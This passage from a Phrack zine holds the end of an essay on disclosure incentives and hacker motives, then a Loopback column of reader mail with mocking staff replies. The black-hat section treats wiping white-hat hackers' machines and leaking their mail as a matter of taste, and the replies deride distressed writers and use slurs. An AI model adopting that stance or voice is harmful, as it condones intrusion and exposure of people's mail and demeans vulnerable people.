   2.1 - Responsible Disclosure
   2.2 - White Knights / Self-Claimed Saviors
  3 - Financial Stability
  4 - Fame
  5 - The Underground Spirit
   5.1 - Hacker By Conviction
    5.1.1 - Jailbreaks
    5.1.2 - Freeing Documents
  6 - Black Hat Stuff
  7 - Conclusion



                             ___________
                            /-/_"/-/_/-/|   +----------------------+
                           /"-/-_"/-_//||  /| Disclosure is futile |
                          /__________/|/|-/ +----------------------+
                          |"|_'='-]:+|/||
                          |-+-|.|_'-"||//
                          |[".[:!+-'=|//
                          |='!+|-:]|-|/
                           ----------


--[ 1 - Prelude

When did all that get started..? Quite a while ago, being a hacker was not
something you'd have hawked around. Finding bugs, practicing offensive
techniques, writing cool exploits and last but not least pwning boxes was
an underground thing you didn't talk about very much. And it still is! The
hacking underground has not magically disappeared; but now there's also a
very publicly visible hacking scene. Besides 31337 underground h4xx0rs, we
now have serious security researchers and consultants, who aim to improve
the world by finding bugs and disclosing them in a responsible manner. And
of course the idea of improving something is not a negative thing in
itself.. Wouldn't you agree?

Things are rarely as easy as they seem, so let's try to explore the
situation. What happens nowadays can be described by the following example:
researcher X finds a bug in some widely-used product. Now X communicates
this bug to the vendor, asking them to come up with a fix. After the vendor
has released a fix, X publicly discloses the bug. This is what "responsible"
disclosure is roughly about. And this is generally not a bad approach. But
what X now does is to come up with a scary-sounding name and an ugly logo
for the vulnerability. Yeah, a cool vuln needs a name and a logo! And of
course it also needs press attention! But you know, X only takes the burden
of doing all that because X wants the world to be a safer place. This is why
X discloses responsibly and also why X needs all that press hype: users
must be made aware of the problem! And while saving the world, X of course
also enjoys the publicity, the press attention and the free b00ze at
conferences. All this (modulo the b00ze, maybe) also contributes to X's job
security and so it's a win-win situation.

Now we're getting more to the gist of the matter, but let's yet dig a bit
deeper. The motivation of overhyping bugs and designing shitty logos
appears to be three-fold: the common good, job security (== financial
stability) and a little bit of fame, too. Let us look at each of these
individually.

--[ 2 - The Common Good

Believe it or not, there are actually people who want to improve the world,
want to do something for the common good. And at the first glance, it might
even seem that finding and disclosing bugs actually contributes to a safer
world. It does insofar as a fixed bug cannot be exploited by attackers
anymore. Now, auditing all code, finding, disclosing and fixing all
existing bugs is obviously not the way a sane person would recommend for
fixing the sorry state of our security: First of all, there are way too
many potential vulnerabilities, even in widely-used, well-audited software
packages out there. Furthermore, it's not like you can snapshot the world
today, remove all vulnerabilities and run this stable snapshot until the
end of time. New bugs will be introduced if we stick to our broken
engineering processes. So, how much will finding, disclosing and fixing
individual bugs really contribute to our security? Little. And I can
already hear you saying: "better contribute little than nothing at all!".
This however implies that you only have two options, which is far off from
the truth. In reality, we have quite a number of effective options for
improving our security. What about defense efforts? What about safe
programming languages? (More) secure operating systems? What about teaching
users how to apply crypto effectively? There's an almost endless list of
effective improvements one could make. Now if you take into account that
there's quite a number of things that will really improve our security,
"doing it for the common good" doesn't appear to be such a good reason
anymore. Contributing to a safer world is only a negligible side-effect of
our hacking. So stop deceiving yourself! You're not taking the hard burden
of hacking just so that the world can be a little bit better. Fucking stop
lying to yourself!

----[ 2.1 - Responsible Disclosure

   ___________________________________________
  /  _\                                       \
  \ (_/_______________________________________/
   \                                         \
    \ You're in a desert, walking along in    \ 
     \  the sand when all of a sudden you look \
    __\  down and see an 0day.                  \
   / )_\                      You drop it on FD. \
   \___/_________________________________________/


If you still want to play the game of vuln hunting and disclosure you
should practice "Responsible Disclosure" they say. Come on, be one of the
good whitehat guys! But what does the ideal Responsible Disclosure look
like? Well actually that is pretty straightforward:

   * The Researcher (also note the term "Researcher" instead of "Hacker"
     whee science!!) finds a terrible security flaw in some product.
   * The flaw is reported by PGP encrypted email to security@$vendor.com.
   * The vendor acknowledges the report and starts investigating the issue.
   * Some time later a fix is implemented by the vendor and patches are
     shipped.
   * An entry on http://vendor.com/security.html is created, and the vendor
     credits and thanks the Researcher for finding the flaw.
   * After some grace period so that the users can actually apply the patch
     the Researcher might publish the details of this awkward flaw.

Wow that's simple, and so responsible! Now let's see how this scheme is
flawed in actual "responsible" disclosure. There is a multitude of points
where this simple scheme might fuck up. Just imagine the following
*absolutely hypothetical* but yet not out of this world scenario:

Researcher Y works at a security company which happens to sell security
(a.k.a. snakeoil) products to protect their innocent customers from bad
0day. In order to protect from 0day there needs to be 0day in the wild, so
researcher Y finds this awesome Internet-ending flaw in a widely used
software product. Next up the process described above is started by Good
Guy Y. Also Y decides to present his elite research at BlackHat. So it
goes... BlackHat is close, and the Logo & Marketing campaign is ready. But
no vendor patch is available yet. Now ask yourself: what would you do in
this situation?

Practicing Responsible Disclosure vs. practicing Full Disclosure is sure a
matter of taste. And as long as you really feel that by responsibly
disclosing a vulnerability you can do something good, please go ahead and
do it. However, being responsible doesn't mean that you actually have to
disclose. You could also just keep the bug for a while (until either the
vendor fixed it or you pwn3d enough boxes). There's a huge controversy
about what form of disclosure is best. We'd like to encourage you to find
that out for yourself, for the particular situation you're in, with the
particular bug you just found. As long as it's your own decision (and not
decided by your marketing department or the Hyve consciousness^W^Wguys on
Twitter), it's probably OK.

----[ 2.2 - White Knights / Self-Claimed Saviors

Let's take a small detour here and have a look at what "hacking for the
common good" can lead to. Let's start with a real interesting example -
Project Zero.  There are many possible explanations of what the real reason
behind p0 might be. We don't want to drift off into conspiracy theories
here. But as a matter of fact, p0 claims that their goal is to protect
people [3]. The common good. Being the current leader of the mobile OS
market [4], it's quite obvious what one would do in order to really protect
people: fucking audit and harden Android. But interestingly, p0 seems
rather to be about dropping 0day on Apple and other competitors of Google.
And the worst thing about that is that there are actual skilled and
well-respected hackers, being part of the p0 team, paid by Google for doing
offensive research. And Google even claims moral superiority because, you
know, at Google we "do no evil". And possibly, at least some of the p0
team members even actually believe they do something for the common good.
This is the most disturbing part about the story. Somehow Google managed to
sufficiently incentivize these hackers to drop bugs on Google's
competitors. Other reasons to work for Google obviously include financial
stability (working for a big corporation) or plainly the money itself. But
let's stick with the aspect of doing something beneficial for the world.
Google managed to buy some of the best hackers we know of. One could now of
course argue that in this special case, letting these hackers "do the right
thing" prevents them from doing bad things. This is related to the central
argument that if p0 goes for high-profile bugs and kills them, then
attackers have to invest significantly more effort if they want to "do bad
things" - and clearly, raising the attackers' effort is good. This
reasoning sheds an interesting light on Google's arrogance. The first part
of the argument is based on the assumption that Google is actually capable
of finding a significant share of all attacker-relevant bugs. This alone is
questionable, but lacking reliable statistics, we cannot directly prove the
opposite. We however assume that our readers know by first-hand experience
what bugs p0 did not kill yet ;) Let's look at the second part of the
argument: raising the attackers' effort is a good thing. Just for the sake
of analyzing the argument, let's pretend that we actually wanted to do all the
white-hat stuff (destroy the black market, make everything safer, save the
whales etc.). The arrogance of the second part of the argument now lies in
the idea that Google actually knows how to fight all the evil in the world.
And their recipe is simple: just make it harder for the bad guys. This
indicates quite a lack of understanding of how complex certain social
structures can be. We don't want to claim we fully understand these either
- by no means. But isn't it possible that instead of killing the evil
underground, p0 actually strengthens the black market? That talented
black hats now raise the prices for their sploits and that because of the
better money you can earn, now even more hackers decide to go the black hat
way?  Maybe even up to the point where the bad guys are paid better than
the good guys at Google? Will those then change sides as well or did Google
manage to brain-wash them enough, using their nanoprobes? Think about the
war on drugs, about alcohol prohibition, about banning porn.. All these
followed very simple ideas that in the end proved to be completely
incompatible with the way society works.

      ---~~~=== Shouts to p0 for raising the market value ===~~~---

        XXXXXXXXXXXXXXXXX GOOGLE RESERVE 0DAY XXXXXXXXXXXXXXXXXXX
        XXX  XX       THE UNITED STATES OF INTERNET       XXX  XX
        XXXX XX  -------       ------------               XXXX XX
        XXXX XX              /              \      P0-FU  XXXX XX
        XXXXXX     OOO      /          zero  \      ---    XXXXXX
        XXXXX     OOOOO     | ___            |       __     XXXXX
        XXX        OOO      ||   \ __ _ _  _ |      OOOO      XXX
        XXX                 || |) / _` | || ||     OOOOOO     XXX
        XXX     P0-31337    ||___/\__,_|\_, ||      OOOO      XXX
        XXX                 |           |__/ |       --       XXX
        XXX      -------    \                /                XXX
        X  XX                \ ____________ /               X  XX
        XX XXX  _________        --------  ___   _______   XXX XX
        XX XXX            ___  ONE DEAD BUG                XXX XX
        XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
        
There is a less severe form of this behavior: telling others what to do
with their 0day. This commonly happens on Twitter nowadays: "Did you
contact the vendor? No? How irresponsible!!11". WTF? These people really
seem to believe they are morally superior. But what they fail to see is:
First of all, it's not their bug and so nobody actually asked them what to
do with it. Second, they should be happy that the person in question
disclosed the bug at all. Nobody is obliged to do that. But then again, who
takes people on Twitter seriously?

--[ 3 - Financial Stability

We're all getting older. And while this inevitably happens, some develop a
need for financial stability. This is well-studied [2] and we don't feel
like we want to go into great detail here. But branding vulnerabilities
with names and logos is a great way to obtain media attention. And media
attention can directly influence your job security - "yeah we need to hire
that guy, that's the one with the mad skills!" As a matter of fact, this is
how the industry works nowadays and writing this paper won't change it.
It's also not so much the scope of this article to criticize society and
capitalism. So if you find that you really want financial stability, think
about what you do and how you do it. You want job security? Great. But do
you really have to over-hype your own (or worse: other people's) bugs in
order to get your 1-week press attention? Do you want to be hired based on
the logo of your bug or do you want to be hired for your technical
expertise? There are not too many skilled hackers anyway, so do you really
have to be part of all that hype just to single yourself out?

Don't be part of that circus! Yes, other people do it, but you don't have
to. Think about what type of society you create by joining that goddamn
show. A society where skill counts less than appearance, where logos are
better than r00t shells. It is your fucking responsibility to not support
these clowns. If you really want to do something for the common good, then
start at this point.

--[ 4 - Fame

Many people strive for fame - be it globally or in their peer-group.
Hackers are no exception here - and tbh, a little bit of acknowledgement
actually does feel good. But while you try to get your attention, think
about whom you want to get it from and what you want to get it for. Do you
really want to get fame for a technical achievement (such as a cool
exploit), from people who don't even understand the basics behind it? Or
worse, do you want fame for something that is actually pretty lame but
people fail to realize that? If that's what you're after, then please go
straight ahead with your logo-branded vulnerability whitehat responsible
disclosure press attention shit. If you want your fame only from your
peer-group then stay there, that's fine. And if you really want to impress
the broad masses, then please do something that is actually beneficial for
the broad masses - exploiting individual bugs isn't. It appears to us that
some people also try to compensate for problems in their life by
accumulating fame. We don't want to dive into the emo^Wpsychology thing
here, but next time you feel the inner desire to impress random people with
random things, you might want to double-check your reasons.

--[ 5 - The Underground Spirit

This is probably what makes most of us tick. The thirst for knowledge. The
infinitely many ways of combining and (ab)using technology. The thrill of
finding a bug, the kick when you see uid 0. This thrill of hacking can
really become addictive (this is an observation Halvar Flake described very
nicely in [1]). It's neither good nor bad - neither particularly useful in
itself nor is it a waste of time. Hacking is one of the many ways humans
express themselves, their mental power. Others prefer maths, music, writing
or other arts. There is not much to say about the spirit itself in the
context of this ranty paper.

----[ 5.1 - Hacker By Conviction

Not everybody sees hacking as an end in itself. There are a number of hackers
out there who follow certain ideals - free access to information is a
particularly popular one. And occasionally, one or more of these hackers
make a real break-through. There are way too many achievements to be named
here. However, we'd like to highlight the incentives behind a couple of
randomly chosen popular hacks. And we'd like to do this because not
everything is what it seems to be. Even if we rant about logo-branded
vulnerabilities, attention-whores, the press, p0 and whatnot.


       The drug                .--.          
         that makes   ,-.------+-.|  ,-.     
             ,--=======* )"("")===)===* )    
             o        `-"---==-+-"|  `-"     
             0day   us tick    '--'       
                                              

------[ 5.1.1 - Jailbreaks

The right to use a device that you bought with your own money in whatever
fucking way you like to (yes, that includes shoving it up your ass) as long
as you don't harm anybody is something that should be universal.
Unfortunately, self-proclaimed saviors like Apple tend to have a different
view on that topic. If they were to decide, they'd use their arrogant and
flawed quick-and-dirty patches to make the world sooo much better. That is:
ban porn, ban drugs, ban fucking curse words, give your boss access to your
private photo stream and whatever else comes to their mind. Fortunately,
there are people who are not willing to accept this kind of behavior. Under
this point of view, jailbreaks are an actual improvement to your freedom.
Yes, this actually is hacking for the common good. And yes, in the
jailbreaking scene there are people who do it (partially) for fame or
money. But the good cause is still clearly visible.

------[ 5.1.2 - Freeing Documents

We don't want to start the Wikileaks vs. politics flamewar here. But we
still feel that the positive effect of freeing government documents is
remarkable. People actually take personal risks while trying to provide
leaked documents. Of course, these people are not necessarily motivated
*only* by wanting to contribute to a better society. But this is not the
relevant point: they do something that mankind benefits from. And this
benefit is clearly visible.

--[ 6 - Black Hat Stuff

There is not too much to say here. Just as in the vulnerability circus, the
black hat scene offers different incentives for different people. Fame and
money do play a role - hacking for a common good not so much. Another
motivation for staying in the underground can be the desire to isolate
oneself from the clowns in the vulnerability circus. This can lead to
rather extreme forms, such as pwning and rming white-hat hackers' boxes,
exposing them in underground zines, making their mail spools public... You
get the idea :) You should form your own judgement when it comes to
these kinds of things.

--[ 7 - Conclusion

You might have observed the little stack we built in this article. It all
originates from the underground spirit. For some it goes down to the
black hat stuff (and way deeper, but we'll save this for another article),
for others it goes up, from the underground spirit to getting fame,
from getting fame to obtaining financial stability and from financial
stability to really believing you do things for the common good, thereby
finally deceiving yourself and becoming one of the clowns in the
vulnerability circus. No matter what you do: think about your incentives
and about your goals. Think about why you do what you do and who might
benefit from that. And then be honest with yourself and check that what
you're doing is what you actually wanted.

So is hunting 1337 bugs actually a bad thing? Not at all! Disclosure? No!
Doing it for money? Neither. Do whatever you want to do, but think about
your incentives! And maybe the next time you justify your behavior by
claiming to contribute to the common good, by believing you need to do it
for the money or by thinking you need the fame, sit back and think about
that for a second - try to identify the real reasons for what you're doing.

And this is it. We don't want to encourage any particular kind of moral
behavior. You should be old enough to find that for yourself. We just want
you to be honest with yourself, to act consciously. Wherever in the
over-simplified stack we have just shown you think you are.

Yours sincerely, anonymous coward(s)
794384322cdb45fe41369731e3b8ff74b52beef5

--[ References

[1] http://www.isaca.org/chapters2/Norway/NordicConference/Documents/14.pdf
[2] Abraham Maslow: A Theory of Human Motivation
[3] https://cansecwest.com/slides/2015/
    Project%20Zero%20-%20making%200day%20hard%20-%20Ben%20Hawkes.pdf
[4] http://www.idc.com/prodserv/smartphone-os-market-share.jsp


|=[ EOF ]=---------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x05 of 0x10

|=-----------------------------------------------------------------------=|
|=------------------------=[  L O O P B A C K  ]=------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[  Phrack Staff  ]=--------------------------=|
|=-----------------------------------------------------------------------=|


Four years since the last Loopback. We got _a lot_ of mail. Tonz. The
retardz, the crazies, the elites (both the real and the self-proclaimed
ones), they all vent to us. We are honored, confused, amazed and
entertained. Sometimes all of these at once.

Also, porn spam is fun, sometimes. There is a strange poetry even to porn
spam that is clearly autogenerated. Our in-house porn spam expert is
continuously sharpening his poetry skills.

Keep sending your innermost thoughts to us. Please. Our Loopback personnel
have become addicted to them.


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x00 - The "back my articles" saga ]=------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]

From: attackingthecore2@gmail.com
Subject: Can I back my artcles.

I released many many many 15 articles to phrack to release. and The basic
Integer Overflow blexim phrack 60 is my a.k.a new make. want all articles
back and credit in the article and reference credit. and advance.

.x90c.

        [ What? Hey x90c, are you okay dude? ]

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Can I back my artcles.

I'm the phrack author. back my articles right way.

        [ Which author exactly? All of them? ]

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Can I back my artcles.

back my articles.

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Re: Can I back my artcles.

back articles.

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Re: Re: Can I back my artcles.

back my articles.

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Re: Re: Re: Can I back my artcles.

back my articles. right way.

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Re: Re: Re: Re: Can I back my artcles.

back my mine articles.

        [ Your articles are being backed. This is an automated message. ]

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Re: Re: Re: Re: Re: Can I back my artcles.

If possible, I want to submit the Basic Integer overflow only to phrack
article mine and other 14 articles more are back my apache tomcat server
daemon to feedback paper.

.blexim. KyongJoo Jung.

        [ After he realized that we ignore retardation, he tried to reason
          with us ;-) ]

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Re: Re: Re: Re: Re: Re: Can I back my artcles.

I wish to get it all personal stream text.

        [ Back to full retard mode. ]

                                    ---

From: x90c <geinblues@gmail.com>
Subject: ANTISPAM ANTISPAM GET MY ARTICLES AND SITE MY OWN

I submit some files ago ( belows and all accepted by your phrack site_s)
gave me my credit as my handle(mojito, nickname, be cool),
fg1, new flash(phrack main graphic), and now paper feeds all for #69.

http://www.phrack.org/issues/64/6.html#article

my want list:
1. phrack account. (fg1@phrack.org, straruss@phrack.org, aaron potney
s random account too.)
2. email service for article great to public socials.
3. I need your service for my articles(in phrack) to advertise public
medias.

thanks for reading. and rapid toki is well. as well. as well.

.twzi (it was my handle when it published and i can use it continuly?
right?! answer me. okay!.)

        [ So he is actually fg, strauss, deft and twiz. Is he also
          Johnny Mnemonic? Tyler Durden? Elliot Alderson? No one wants to
          know really. At least he used ANTISPAM this time, we have to give
          him that. ]

                                    ---

From: x90c <geinblues@gmail.com>
Subject: taran: stop paper feed.

        [ Aw, this one hurt our feelings ;-( ]

                                    ---

From: attackingthecore2@gmail.com
Subject: I'm hard to write more just want staff@phrack.org id.

for a credit to complete the hacker hacking.
l33t more l33t more l33t = staff@phrack.org (kid leet, leet leet(mark dowd
style), staff leet leet).

        [ The hacker hacked the elite hacking staff. What exactly are we
          talking about again? Did you also write duke's papers?
        
          This last mail somehow made sense to us, so we decided to give
          the staff@ mail to him. And back his articles.
        
          No, not really ;-) ]


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x01 - Reality hacking or just insanity? ]=------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]

From: V Bradshaw <lovemomcleo@gmail.com>
Subject: Help for me and my baby from "projectors" in consciousness

Hello,

I urgently need help for me and my 11 month old baby from people who are
attempting to project into my consciousness and steal my "awareness" and
things in my awareness. They are trying to steal my baby's consciousness
and take my "reflector." I serve the highest light, in the  name of Jesus
Christ.

Please help me or direct me to people who can work with me in consciousness
to protect me and my baby. I want to find the "projectors" in
consciousness.

Thank you,
Imago

        [ Dude, your mail was totally cool until that "Jesus Christ" thing.
          We have a lot of psychic experts in Phrack that could help you
          locate the malicious projectors. However, they're all atheists.

          Tough luck. ]


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x02 - Message from mom ]=-----------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]

        [ As you would expect, we get a lot of mail that doesn't make
          sense, and is often outright demented. But sometimes we get texts
          that can't be easily classified. Is it spam? Is it the ramblings
          of a mad man? Of a retired elite tripping on acid?

          It can't be. It doesn't make any sense at all. Or does it? ]

From: "Perforated P.P.Pig" <momislove84@yahoo.com>

====BEGIN MESSAGE FROM MOM====
  ______  __
 /      \/  |
/$$$$$$  $$ |____
$$ |  $$ $$      \
$$ |  $$ $$$$$$$  |
$$ |  $$ $$ |77$$ |
$$ \__$$ $$ |  $$ |__
$$    $$/$$ |  $$ /  |
 $$$$$$/ $$/   $$/$$/
                  $/


    by The Pain (no cozmik?! the fuck kind of figlet generator...)

 __       __                   __  ______                    __
/  \     /  |                 /  |/      \                  /  |
$$ \   /$$ | ______  _______ $$//$$$$$$  ______   _______ _$$ |_
$$$  \ /$$$ |/      \/       \/  $$ |_ $$/      \ /       / $$  |
$$$$  /$$$$ |$$$$$$  $$$$$$$  $$ $$   | /$$$$$$  /$$$$$$$/$$$$$$/ 
$$ $$ $$/$$ |/    $$ $$ |  $$ $$ $$$$/  $$    $$ $$      \  $$ | __
$$ |$$$/ $$ /$$$$$$$ $$ |  $$ $$ $$ |   $$$$$$$$/ $$$$$$  | $$ |/  |
$$ | $/  $$ $$ 78 $$ $$ |  $$ $$ $$ |   $$       /     $$/  $$  $$/ 
$$/      $$/ $$$$$$$/$$/   $$/$$/$$/    $$$$$$$/$$$$$$$/   $$$$/

                                 ==

All these lines, lines, lines... And the bees!
https://www.youtube.com/watch?v=wRmmlqqejGI

Just a joke. :)

Hi everyone. Mom here. Remember those teletype pranks?

Go ahead!

Okay. Now that I've made you laugh (perhaps!), I'd like to talk to you
about drums: https://www.youtube.com/watch?v=S219XUm18LA (find the
original!)

(That's going to happen a lot. Have fun with the puzzles I've left for you,
children!)

In all seriousness, do you know what's frustrating? This:
http://phrack.org/issues/7/3.html

This is not frustrating because it was written by a child. This is not
frustrating because it was poorly written (in fact, that's what makes it
so charming and touching). This is not frustrating because it is true.

This is frustrating because it cannot be heard. Not to mention that being a
child is considered an insult. Children are smarter than you think. Fuck
the pedos for thinking that sentence was for them.

=======================

     o
    /|--
   / |__      *OllyDBG* to popshuvit
    /
    \____/
    o  o
   /
  *

=======================

419 Eater! <3 Gosh, my deficits are flaring. Poor Dow. But not Koch. Is it
Live? Or is it... 1057? ;3

More humor for my unheard children, to contrast the carefag that is this
doc.

Laundry day is a very dangerous day.
https://www.youtube.com/watch?v=D12FIDySF0I

Let's resume. (I'm sure you grasp the abilities and necessities of a
breakpoint, yes? =) [You resumed by parsing on the next line. Neat, huh?]
Unclosed[F9]

Good. Chord progressions. This is frustrating because it cannot be heard.

Its lack of oiga (horale) has everything to do with the fact that, for some
absolutely idiotic reason, if your message isn't worded in just the most
precise way, then the authoritative figures who love to take advantage of
that beautiful hacker brainmeat you all po sess (ion) will simply find
excuses to ignore you. (Good.) For ignoring you is how they hold power.
Have you ever wondered why a child is screaming in public? And how its
incoherency renders your ears to be damaged, like a sword through the
heart? And yet, the adult in that situation screams back. "How dare you
scream! How dare you yell! We're in public! You can't dot hat!" (Hehehe...
you can't dot hat. cant.hat. Can that. Black. My name is black.
https://www.youtube.com/watch?v=UEOLPDOKdtY&list=RDUEOLPDOKdtY)

Mom has cited The Hacker Manifesto numerous times throughout her life to
exemplify the problem with the American education system, and frankly, as
Reagan's illegitimate children (he was great with freedom but miserable
with policy-- talk amongst yourselves, I'm getting vaklempt!) a good
chunk of mom's American children understand exactly what I'm talking
about. Yet their adult counterparts refuse to understand. They're so god
damn busy measuring you that they don't actually see you for who you are.

They don't care about you. They care about the bottom line. They care about
power.

They don't care about teaching. They don't care about your desire to learn.
And you've always known this in your hearts. And you know it to be true.

They seek control. So you take it away. And they HATE YOU for it. But they
deserve it. They don't listen to children. They listen to money. Not the
hilarious `net send`s you spammed on their network. Wasn't that fun? ^_^

Yes. Let the love run through you.
https://www.youtube.com/watch?v=sO_QntXc-c4

(Remember Tamagotchis? https://www.youtube.com/watch?v=WOJfUcCOhJ0)

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 what the fuck [F9]

Hahaha! :D

Mom has cited the Hacker Manifesto [F9] not a breakpoint, repetitive for
effect. With as many times as mom has cited it, the authoritative abusers
just don't seem to "get" it. Much like you lost the game. ;)

Someone's giggling somewhere because taht metaphor lands so very well. Like
nine cans of shaving powder, these are the days of our lives:

[00401000]          v   v   v   v

        I made a discovery today.  I found a computer.  Wait a second,
this is cool.  It does what I want it to.  If it makes a mistake, it's
because I screwed it up.  Not because it doesn't like me...
                Or feels threatened by me...
                Or thinks I'm a smart ass...
                Or doesn't like teaching and shouldn't be here...
        Damn kid.  All he does is play games.  They're all alike.

[jmpnotjle]                                 ^  ^  ^  ^  ^  ^

Do you know why I've brought you here? Have a seat. You're not a pedophile.
You've just been abused by them. That's how you got those scars.

(Of course, not -all- authority figures are pedophiles, but fuck it, it's
hilarious to call them such. Hint. ;) No idea what you're talking abuot.

If you make a mistake, it's because you screwed up. And it's beautifuil,
isn't it? That carnal truth, that one and zero, that declaration of logic
shooting through your veins like... well, you know what it means. You've
read it.

Parsing error.)

Because you're hackers. You study. You learn. You love to learn. You never
stop. And it's beautiful. Guerilla scientists studyig the art form they
love the most: the one and the zero in a series of bytes, words, dwords
and now, qwords. :)

A summary of who hates you: https://www.youtube.com/watch?v=95t1pLrm70s

These fucking people. These fucking abusers. I'm getting angry. Here's a
defusor for your carefag:
https://www.youtube.com/watch?v=JzNku_x2SLA -- steve brule

[F9] Thank you. :) Where was I? So much to say...
https://www.youtube.com/watch?v=AHBYgbA0sU8

In The Hacker Manifest, there is a carnal desire to be heard. To be under-
stood. (Read /The Stand/ by Stephen King.
https://www.youtube.com/watch?v=NkKOeeYko7w) To explain that by which no
adult actually wishes to hear. (Havey ou noticed the off-by-one yet?) To
declare war in a child-like way. And yet it just cannot be heard.

Can it not be heard? Or does it not want to be heard? Ah... the rub.

Adults deny they're failing children. This is the message of The Hacker
Manifesto. Not directly-- of course not directly. It's so clear that The
Mentor++ in all his absolutely vivacious youthful brilliance-- push and
pop is not only mad at the adults for having failed them (wtf mom), but is
equally knowledgeable that his data these lines are leaking too long
supersedes the concept of authority. Indeed, it renders authority to be an
irrelevant object, perpetuated by fearful drones finding the floorboards of
their hilariously poorly constructed ships of code having their nails being
ripped out from under them in the form of exploits, engineering and overall
eclectic compromise. (Typos are fun.) INJECT INJECT

So what that The Mentor did not select the "proper" worsd? (Also known as
diction. Boundaries are useful and great to break.) So what that he made
typos? So what that his angst was so clear and apparent in his writing? So
what that he was an assertive carefag with his writing? SO FUCKING WHAT?
https://www.youtube.com/watch?v=0XoyDqFy5pU

He was correct. Deal with it. http://tinyurl.com/marshmelol

Those who cannot see that The Mentor was correct should perhaps attempt to
learn who they're up against (of course, they never will, because...):

          v  v  v  v  v  v

        This is our world now... the world of the electron and the switch,
the beauty of the baud.  We make use of a service already existing without
paying for what could be dirt-cheap if it wasn't run by profiteering
gluttons, and you call us criminals.  We explore... and you call us
criminals.  We seek after knowledge... and you call us criminals.  We
exist without skin color, without nationality, without religious bias...
and you call us criminals. You build atomic bombs, you wage wars, you
murder, cheat, and lie to us and try to make us believe it's for our own
good, yet we're the criminals.

        Yes, I am a criminal.  My crime is that of curiosity.  My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never forgive
me for.

        I am a hacker, and this is my manifesto.  You may stop this
individual, but you can't stop us all... after all, we're all alike.

                                         ^  ^   ^

Thank you children. Off by one. But which way? ;-)

(Hola, Espana! https://www.youtube.com/watch?v=U-Oxx_YbYnM)

Welcome. You've got mail! Goshk, I had no idea that my password needed to
be changed! Thanks Steve Case,my password is fishing!

Mom got infected with a false punter once. It told her "your computer has
been FUCKED!!!" Over and over again. In a DOS terminal.

I couldn't stop it. I didn't know what it meant. I was young. I thought I
was just having fun, you know? It was hilarious to press "punt" and watch
people disappear. (Third person. First person. Literary techniques.)

Ah... Mom is letting her ego leak. F9 for me, darlings.

moar liek F8 amirite (Indeed. <3)

The enemy of our community is very much the script kiddie. Ah, but, as
hackers, you must understand what a script kiddie truly is. You are on the
right track: a script kiddie has an ego issue. But your mother would like
to explain verbosely her understanding of the script kiddie, for the script
kiddie is a metaphor for the floor 4 the enemy of your mind.

https://www.youtube.com/watch?v=UDf2r9DnVGU

Do you know what a script kiddie is? It's not someone who's just not
talented. It's not someone who simply uses the tools of this community--
no, it's much more than that. A script kiddie is someone who abuses the
knowledge they can't truly grasp for the sake of power. A script kiddie is
someone who takes what's been given to them-- the love and beauty of every
single passionate line of code per each exploit, dropper and packer-- and
simply gloats. Yeah, you're a hacker alright-- you hack emotions. And it's
not to say that you're not talented for hacking emotions-- it's an
important talent in a lot of regards. No, what gives script-kiddie the
disgusting charge it deserves is the way a script kiddie works: braggart;
liar. Thief.

Of course these are simply different kinds of artists, sure. Liars are
talented. Thieves have the slipperiest fingers around. (There is in fact
honor among thieves. Don't buy that prior rhetoric.) And in their own re-
gards, script kiddies have a special kind of talent.

They can convince you that they are a hacker because they look like one.

There's a world of difference between a script kiddie and a hacker. And it
binarily has nothing to do with the fact they didn't roll their own code.

A script-kiddie is not a hacker. Why? How? They use the tricks, do they
not?

They do. And they shouldn't. You should stop them. For their primary goal
is to feed and inflate their ego. Not hack.

We've taken it to understand for quite some time that a script kiddie is
not to be respected-- and this is correct. One who seeks to increase their
sense of fame over their passion-- or, rather, that their passion -is- in
fact their ego-- can be considered a hacker in some way or another. But we
should deny them this. We should simply lie. Kill the narcissist.

Is a child not a hacker because they only use Metasploit? Nay, say moms,
for the child is a hacker because they know how to USE Metasploit. One
cannot simply compromise Mordor even by executing AutoPwn-- mom's tried.
Mom failed. Mom is not a break-in artist like a lot of her children. Mom
can write exploits++ she simply sucks at executing them. (Or perhaps you
don't know the exploits your mother is capable of. Trixy thingsies. ;) pop

Is a child a script-kiddie because they use Metasploit? Nay, say moms, for
the same reasons listed above-- only a hacker would know what exploits to
run where after perusing a system's entryways. A script-kiddie gets upset
at the lack of capable elegance of mashing buttons like a fucking retard.

(Hackers understand the dualism of words like retard and faggot. Skids
don't.)

So are script kiddies hackers? Technically, yes. Logistically, fuck 'em.

[Alt+0153]

Why fuck them? Their ego gets in the way. It gets in their way. It gets in
your way. It gets in the community's way.

The hacker community is one of this world's best communities for the sake
of its strong desire for ego death. You know, killing attention whores?
Quite a worthy past-time of the hacker community. It deserves to be done
more, really.

Ego death is the core of the hacker. Ego life is the core of the script-
